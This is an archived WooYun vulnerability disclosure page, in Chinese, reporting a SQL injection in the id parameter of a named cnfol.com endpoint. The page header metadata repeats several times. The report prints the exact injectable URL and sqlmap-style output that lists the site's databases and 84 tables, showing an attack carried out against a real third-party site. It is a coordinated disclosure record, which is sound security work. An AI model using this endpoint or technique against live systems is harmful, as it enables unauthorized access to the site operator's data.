中金在线某站SQL注入 | wooyun-2015-0134638| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134638

漏洞标题：中金在线某站SQL注入

漏洞作者：路人甲

提交时间：2015-08-17 10:26

修复时间：2015-10-01 10:34

公开时间：2015-10-01 10:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-17：细节已通知厂商并且等待厂商处理中
2015-08-17：厂商已经确认，细节仅向厂商公开
2015-08-27：细节向核心白帽子及相关领域专家公开
2015-09-06：细节向普通白帽子公开
2015-09-16：细节向实习白帽子公开
2015-10-01：细节向公众公开

简要描述：

详细说明：

# SQL注入
http://shell.cnfol.com/article/recomend_newjson.php?id=1975&record=4&len=22&call=?
id=参数存在注入

[09:58:57] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[09:58:57] [INFO] fetching database names
available databases [2]:
[*] cnfolCMS
[*] information_schema

Database: cnfolCMS
[84 tables]
+-----------------------------+
| article_coll                |
| channel_data                |
| cnfol_appclass              |
| cnfol_arcontent             |
| cnfol_arcontent_2011        |
| cnfol_arcontent_201109      |
| cnfol_arcontent_201110      |
| cnfol_arcontent_201111      |
| cnfol_arcontent_201112      |
| cnfol_arcontent_2012        |
| cnfol_arcontent_201206      |
| cnfol_arcontent_201212      |
| cnfol_arcontent_2013        |
| cnfol_arcontent_201302      |
| cnfol_arcontent_201303      |
| cnfol_arcontent_201304      |
| cnfol_arcontent_201305      |
| cnfol_arcontent_201306      |
| cnfol_arcontent_201307      |
| cnfol_arcontent_201308      |
| cnfol_arcontent_201309      |
| cnfol_arcontent_201310      |
| cnfol_arcontent_201311      |
| cnfol_arcontent_201312      |
| cnfol_arcontent_2013_all    |
| cnfol_arcontent_2014        |
| cnfol_arcontent_201401      |
| cnfol_arcontent_201402      |
| cnfol_arcontent_201403      |
| cnfol_arcontent_201404      |
| cnfol_arcontent_201405      |
| cnfol_arcontent_201406      |
| cnfol_arcontent_201407      |
| cnfol_arcontent_201408      |
| cnfol_arcontent_201409      |
| cnfol_arcontent_201410      |
| cnfol_arcontent_201411      |
| cnfol_arcontent_201412      |
| cnfol_arcontent_2014_all    |
| cnfol_arcontent_2015        |
| cnfol_article               |
| cnfol_article_del           |
| cnfol_attachment            |
| cnfol_block                 |
| cnfol_blockgroup            |
| cnfol_blockhistory          |
| cnfol_blockrecommend        |
| cnfol_blockrecommendhistory |
| cnfol_blockversion          |
| cnfol_category              |
| cnfol_cloudpermission       |
| cnfol_content               |
| cnfol_content_del           |
| cnfol_content_unaudit       |
| cnfol_directory             |
| cnfol_editlimit             |
| cnfol_filterword            |
| cnfol_forward               |
| cnfol_hwitem                |
| cnfol_keyword               |
| cnfol_log                   |
| cnfol_menu                  |
| cnfol_picture_del           |
| cnfol_picture_group         |
| cnfol_picure                |
| cnfol_releasepoint          |
| cnfol_site                  |
| cnfol_source                |
| cnfol_special               |
| cnfol_special_copy          |
| cnfol_special_list          |
| cnfol_specialclass          |
| cnfol_tag                   |
| cnfol_tagauditing           |
| cnfol_tagcontent            |
| cnfol_template              |
| cnfol_templateclass         |
| cnfol_urlrule               |
| cnfol_useddirectory         |
| cnfol_watermark             |
| cnfol_workcount             |
| kktest                      |
| kktest1                     |
| templateclass               |
+-----------------------------+

网速不给力.... 证明注入就好..

漏洞证明：

综上

修复方案：

你会的

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-08-17 10:33

厂商回复：

感谢提供漏洞信息，我们会立即处理掉。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134638

漏洞标题：中金在线某站SQL注入

相关厂商：福建中金在线网络股份有限公司

漏洞作者：路人甲

提交时间：2015-08-17 10:26

修复时间：2015-10-01 10:34

公开时间：2015-10-01 10:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134638

漏洞标题：中金在线某站SQL注入

相关厂商：福建中金在线网络股份有限公司

漏洞作者： 路人甲

提交时间：2015-08-17 10:26

修复时间：2015-10-01 10:34

公开时间：2015-10-01 10:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0134638"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云